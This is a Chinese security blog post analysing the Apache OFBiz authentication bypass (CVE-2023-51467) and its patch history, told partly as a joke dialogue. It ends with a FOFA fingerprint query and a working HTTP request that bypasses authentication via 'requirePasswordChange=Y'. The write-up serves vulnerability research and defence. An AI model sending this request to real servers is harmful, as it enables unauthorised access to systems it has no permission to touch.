Apache OFBiz 身份验证绕过远程代码执行漏洞分析-安全与开发的精彩对抗【附POC】
2023-12-29 10:18:5 Author: 天擎攻防实验室(查看原文) 阅读量:36 收藏

声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

      现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!

产品简介

       OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。

漏洞分析

   Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467)和Apache OFBiz 未授权远程代码执行漏洞(CVE-2023-49070),打法都一样。想看复现的直接拉到最后,只不过是官方正确修复了这个漏洞。

在将这个漏洞之前呢,其实这个接口之前是个未授权的rce。

https://blog.csdn.net/zkaqlaoniao/article/details/135085674

这篇文章已经讲的很明白了。

CVE-2020-9496的的修复方案就是给这个接口加上了鉴权。此时,问题出现了:

安全工程师:你这个加上授权就不是漏洞了?有授权命令执行!web应用权限直接提到服务器权限!

开发:这XX的,xmlrpc的问题,和我有什么关系?

大家看过罗x浩星巴克的片段吧?你就把安全工程师想象成星巴克服务员,开发想象成罗x浩(不恰当,多担待。):

    于是官方怎么修的呢? 

    给xmlrpc这个接口加上过滤,谁来解析xmlrpc这个接口,就进入我的特殊匹配逻辑,胆敢有人序列化,我就直接干掉!

    于是:

这时候安全工程师又看出来问题了:

    你咋xx写的过滤?,我一个空格不就绕过你这个序列化匹配了吗?

于是:

于是匹配</serializabled>变成了匹配</serializabled

    几年之后,安全工程师又看出问题了:你这个鉴权有问题呀!你咋xx写的鉴权?我直接requirePasswordChange=Y直接给你绕过了,你也别鉴权了。

    安全工程师找到开发:你这里有个Apache OFBiz xmlrpc身份验证绕过漏洞

    开发:什么漏洞?

    安全工程师:你这里有个Apache OFBiz xmlrpc身份验证绕过漏洞

    开发:Apache OFBiz什么?

    安全工程师:你这里有个Apache OFBiz xmlrpc身份验证绕过漏洞

    开发:xmlrpc漏洞是吧?我不要了行不行?反正也没人用。

    于是,开发连夜愤怒删代码,把xmlrpc相关的都删除了,你们安全工程师也别叭叭了

    于是,安全工程师又又又又看出问题了:

好好好,你们业务就XX这么修是吧?我说了,鉴权问题,鉴权问题!你xmlrpc用不了,我ping还有其他的还能用啊!

于是:

指纹识别

app="Apache_OFBiz"

漏洞验证

poc:

GET /webtools/control/ping?USERNAME&PASSWORD=mdtest&requirePasswordChange=Y HTTP/1.1Host: Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close

发送POC:

批量验证:

漏洞收录

漏洞已收录于团队内部漏洞库(建设于2019年),现已收集4000+实战漏洞

现仅供团队内部使用,每月随机抽取关注者加入社群交流学习。

回复关键字【POC】获取POC下载链接

点击下方名片进入公众号,欢迎关注!

点个小赞你最好看


文章来源: http://mp.weixin.qq.com/s?__biz=MzU2MzQyMjA1NA==&mid=2247484311&idx=1&sn=695d45d15535e9df2b91a1d58005c2e5&chksm=fd4d679fc4fd53c543182567c04d7dea638044eb3d165a3a98994a7ef4094f872db0cd4fc9bb&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh